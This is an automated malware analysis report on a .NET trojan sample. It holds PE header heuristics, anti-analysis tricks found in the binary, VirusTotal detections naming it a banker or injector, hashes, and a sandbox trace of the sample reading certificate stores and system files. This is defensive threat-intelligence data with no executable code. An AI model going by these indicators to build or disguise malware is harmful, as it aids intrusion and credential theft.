WebBrowserDocumentCompletedEventHandler
WebBrowserDocumentCompletedEventArgs
DebuggerNonUserCodeAttribute
HideModuleNameAttribute
ShutdownEventHandler
_RichTextBox1
get_RichTextBox1
set_RichTextBox1
_Button3
_Button2
_Button1
_CorExeMain
set_Form1
get_Form3
get_Form2
get_Form1

Foremost
Matches
0.exe, 247 KB, 331.png, 78 KB
Suspicious
True check_circle
Heuristics
IPs
hasIPs: True check_circle
Allowed
Suspicious: 15.4.27.16, 0, Unknown
hasAllowed: False cancel
hasSuspicious: True check_circle

URLs
Allowed
hasURLs: True check_circle
Suspicious: http://www.google.com
hasAllowed: False cancel
hasSuspicious: True check_circle

Files
Allowed: mscoree.dll
hasFiles: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Binary
Sizes
RVA
RVA: 16
Suspicious: False cancel
Code
Size: 151552
Suspicious: False cancel
Image
Address: 4194304
Suspicious: False cancel
Stack
Stack: 4096
Suspicious: False cancel
Headers
Headers: 512
Suspicious: False cancel
Suspicious: False cancel

Symbols
Number
Number: 0
Suspicious: True check_circle
Pointer
Pointer: 0
Suspicious: True check_circle
Directories
Number: 16
Suspicious: False cancel

Checksum
Value: 318402
Suspicious: False cancel

Sections
Allowed: .text, .rsrc, .reloc
Suspicious
hasAllowed: True check_circle
hasSections: True check_circle
hasSuspicious: False cancel

Versions
OS
Version: 4
Suspicious: False cancel
Image
Version: True check_circle
Suspicious: 4
Linker
Version: 11.0
Suspicious: False cancel
Subsystem
Version: 4.0
Suspicious: False cancel
Suspicious: False cancel

EntryPoint
Address: 108766
Suspicious: False cancel

Anomalies
Anomalies
hasAnomalies: False cancel

Libraries
Allowed: mscoree.dll
hasLibs: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Timestamp
Past: False cancel
Valid: True check_circle
Value: 2015-06-20 23:29:37
Future: False cancel

Compilation
Packed: False cancel
Missing: False cancel
Packers
Compiled: True check_circle
Compilers: Microsoft Visual C# / Basic .NET, Microsoft Visual Studio .NET, .NET executable, Microsoft Visual C# v7.0 / Basic .NET

Obfuscation
XOR: False cancel
Fuzzing: True check_circle

PEDetector
Matches
None
Suspicious
False cancel
Disassembly
hasTricks
True check_circle
Tricks
pushret
.rsrc: 44
.text: 1

pushpopmath
.rsrc: 31
.text: 70

garbagebytes
.rsrc: 15

hookdetection
.rsrc: 2

software breakpoint
.rsrc: 1

fakeconditionaljumps
.rsrc: 4

programcontrolflowchange
.rsrc: 11

cpuinstructionsresultscomparison
.rsrc: 1
.text: 6

AVclass
msilperseus
1
VirusTotal
md5
50c8d4a1457b26990b63796108afe7eb
sha1
fd2c81a2ff5e1da6421fb45b639381f84b7db0e6
SCANS (DETECTION RATE = 73.85%)
AVG
result: MSIL:Banker-BE [Trj]
update: 20180323
version: 18.2.3827.0
detected: True check_circle

MAX
result: malware (ai score=82)
update: 20180324
version: 2017.11.15.1
detected: True check_circle

Bkav
update: 20180322
version: 1.3.0.9466
detected: False cancel

K7GW
result: Trojan ( 004c690f1 )
update: 20180323
version: 10.42.26598
detected: True check_circle

ALYac
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 1.1.1.5
detected: True check_circle

Avast
result: MSIL:Banker-BE [Trj]
update: 20180323
version: 18.2.3827.0
detected: True check_circle

Avira
result: TR/Injector.254512
update: 20180323
version: 8.3.3.6
detected: True check_circle

Baidu
result: Win32.Trojan.WisdomEyes.16070401.9500.9997
update: 20180323
version: 1.0.0.2
detected: True check_circle

Cyren
update: 20180323
version: 5.4.30.7
detected: False cancel

DrWeb
result: Trojan.PWS.Multi.1730
update: 20180323
version: 7.0.28.2020
detected: True check_circle

GData
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: A:25.16481B:25.11861
detected: True check_circle

Panda
result: Trj/CI.A
update: 20180323
version: 4.6.4.2
detected: True check_circle

VBA32
result: TrojanDropper.Injector
update: 20180323
version: 3.12.28.0
detected: True check_circle

VIPRE
result: Trojan.Win32.Generic!BT
update: 20180323
version: 65478
detected: True check_circle

Zoner
update: 20180323
version: 1.0
detected: False cancel

AVware
result: Trojan.Win32.Generic!BT
update: 20180323
version: 1.5.0.42
detected: True check_circle

ClamAV
update: 20180323
version: 0.99.2.0
detected: False cancel

Comodo
update: 20180323
detected: False cancel

F-Prot
update: 20180323
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.MSIL.Injector
update: 20180323
version: 0.1.5.2
detected: True check_circle

McAfee
result: RDN/Generic.dx!d2k
update: 20180323
version: 6.0.6.653
detected: True check_circle

Rising
result: Malware.Undefined!8.C (TFE:C:CdK17hiCWs)
update: 20180323
version: 25.0.0.1
detected: True check_circle

Sophos
result: Mal/Generic-S
update: 20180323
version: 4.98.0
detected: True check_circle

Yandex
result: Trojan.DR.Injector!YFz/iLhG2mQ
update: 20180323
version: 5.5.1.3
detected: True check_circle

Zillya
result: Dropper.Injector.Win32.68188
update: 20180323
version: 2.0.0.3519
detected: True check_circle

Arcabit
result: Trojan.MSILPerseus.D1194
update: 20180323
version: 1.0.0.831
detected: True check_circle

Cylance
result: Unsafe
update: 20180324
version: 2.3.1.101
detected: True check_circle

Endgame
result: malicious (high confidence)
update: 20180316
version: 2.0.5
detected: True check_circle

Tencent
result: Win32.Trojan-dropper.Injector.Svho
update: 20180324
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20180323
version: 2014.3.20.0
detected: False cancel

eGambit
update: 20180324
version: v4.3.5
detected: False cancel

Ad-Aware
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 3.0.3.1010
detected: True check_circle

AegisLab
result: Troj.Dropper.W32.Injector.mmgn!c
update: 20180323
version: 4.2
detected: True check_circle

Emsisoft
result: Gen:Variant.MSILPerseus.4500 (B)
update: 20180323
version: 4.0.2.899
detected: True check_circle

F-Secure
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 11.0.19100.45
detected: True check_circle

Fortinet
result: MSIL/Injector.KHB!tr
update: 20180323
version: 5.4.247.0
detected: True check_circle

Invincea
result: heuristic
update: 20180121
version: 6.3.4.26036
detected: True check_circle

Jiangmin
result: TrojanDropper.Injector.aykz
update: 20180323
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20180324
version: 2013.8.14.323
detected: False cancel

Paloalto
result: generic.ml
update: 20180324
version: 1.0
detected: True check_circle

Symantec
result: Trojan.Gen
update: 20180323
version: 1.5.0.0
detected: True check_circle

nProtect
update: 20180323
version: 2018-03-23.02
detected: False cancel

AhnLab-V3
result: Malware/Win32.Generic.R156465
update: 20180323
version: 3.12.0.20130
detected: True check_circle

Kaspersky
result: Trojan-Dropper.Win32.Injector.mmgn
update: 20180323
version: 15.0.1.13
detected: True check_circle

Microsoft
result: VirTool:MSIL/Obfuscator.BW
update: 20180323
version: 1.1.14600.4
detected: True check_circle

Qihoo-360
result: Win32/Trojan.bd4
update: 20180324
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20180319
version: 6.8.0.5.2551
detected: False cancel

ZoneAlarm
result: Trojan-Dropper.Win32.Injector.mmgn
update: 20180323
version: 1.0
detected: True check_circle

Cybereason
result: malicious.1457b2
update: 20180225
version: 1.2.27
detected: True check_circle

ESET-NOD32
result: a variant of MSIL/Injector.KHB
update: 20180323
version: 17107
detected: True check_circle

TrendMicro
result: TROJ_GEN.R002C0DBF18
update: 20180323
version: 9.862.0.1074
detected: True check_circle

WhiteArmor
update: 20180223
detected: False cancel

BitDefender
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 7.2
detected: True check_circle

CrowdStrike
result: malicious_confidence_100% (W)
update: 20170201
version: 1.0
detected: True check_circle

K7AntiVirus
result: Trojan ( 004c690f1 )
update: 20180323
version: 10.42.26598
detected: True check_circle

SentinelOne
update: 20180225
version: 1.0.15.206
detected: False cancel

Avast-Mobile
update: 20180323
version: 180323-04
detected: False cancel

Malwarebytes
update: 20180323
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20180323
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
result: TrojanDropper.Injector
update: 20180323
version: 14.00
detected: True check_circle

NANO-Antivirus
result: Trojan.Win32.Androm.dztpoa
update: 20180323
version: 1.0.100.22043
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.MSILPerseus.4500
update: 20180323
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20180323
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: RDN/Generic.dx!d2k
update: 20180323
version: v2015
detected: True check_circle

TrendMicro-HouseCall
result: TROJ_GEN.R002C0DBF18
update: 20180323
version: 9.950.0.1006
detected: True check_circle

total
65
sha256
0a11ceaa5a2bd3670357a261460dde1158e8d8c46faf3d94e941099bfab7ffc4
scan_id
0a11ceaa5a2bd3670357a261460dde1158e8d8c46faf3d94e941099bfab7ffc4-1521846275
resource
50c8d4a1457b26990b63796108afe7eb
positives
48
scan_date
2018-03-23 23:04:35
verbose_msg
Scan finished, information embedded
response_code
1
File
Trace
29/2/2020 - 1:45:45.856  Open  1480  C:\malware.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
29/2/2020 - 1:45:45.903  Read  1480  C:\malware.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config  machine.config
29/2/2020 - 1:45:45.903  Open  1480  C:\malware.exe  C:\malware.exe.config
29/2/2020 - 1:45:45.903  Open  1480  C:\malware.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
29/2/2020 - 1:45:45.903  Open  1480  C:\malware.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
29/2/2020 - 1:45:45.903  Open  1480  C:\malware.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
29/2/2020 - 1:45:45.903  Open  1480  C:\malware.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
29/2/2020 - 1:45:45.903  Open  1480  C:\malware.exe  C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Windows\Globalization\Sorting\SortDefault.nls
29/2/2020 - 1:45:45.918  Unknown  1480  C:\malware.exe  C:\Windows\Globalization\Sorting\SortDefault.nls  SortDefault.nls
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Users\Behemot
29/2/2020 - 1:45:45.918  Unknown  1480  C:\malware.exe  C:\Users\Behemot
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Users\Behemot\AppData\Roaming
29/2/2020 - 1:45:45.918  Unknown  1480  C:\malware.exe  C:\Users\Behemot\AppData\Roaming
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Users\Behemot\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Users\Behemot\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Windows\assembly\NativeImages_v2.0.50727_32\index164.dat
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
29/2/2020 - 1:45:45.918  Unknown  1480  C:\malware.exe  C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll  mscorlib.ni.dll
29/2/2020 - 1:45:45.918  Open  1480  C:\malware.exe  C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
29/2/2020 - 1:45:45.918  Read  1480  C:\malware.exe  C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll  mscorlib.ni.dll
29/2/2020 - 1:45:45.934  Read  1480  C:\malware.exe  C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll  mscorlib.ni.dll
29/2/2020 - 1:45:45.934Open1480C:\malware.exeC:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:45.934Unknown1480C:\malware.exeC:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Monitor
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\Monitor
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.75Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
29/2/2020 - 1:45:46.75Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\RichEd20.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\riched20.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\riched20.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\CRYPTSP.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\cryptsp.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\cryptsp.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\qagentrt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\ncrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\ncrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\ncrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\bcrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.153Open1480C:\malware.exeC:\GPAPI.dll
29/2/2020 - 1:45:46.153Open1480C:\malware.exeC:\Windows\SysWOW64\gpapi.dll
29/2/2020 - 1:45:46.153Open1480C:\malware.exeC:\Windows\SysWOW64\gpapi.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\rpcss.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\rpcss.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\uxtheme.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\uxtheme.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.config
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\Windows\SysWOW64\l_intl.nls
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\pubpol4.dat
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC\PublisherPolicy.tme
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
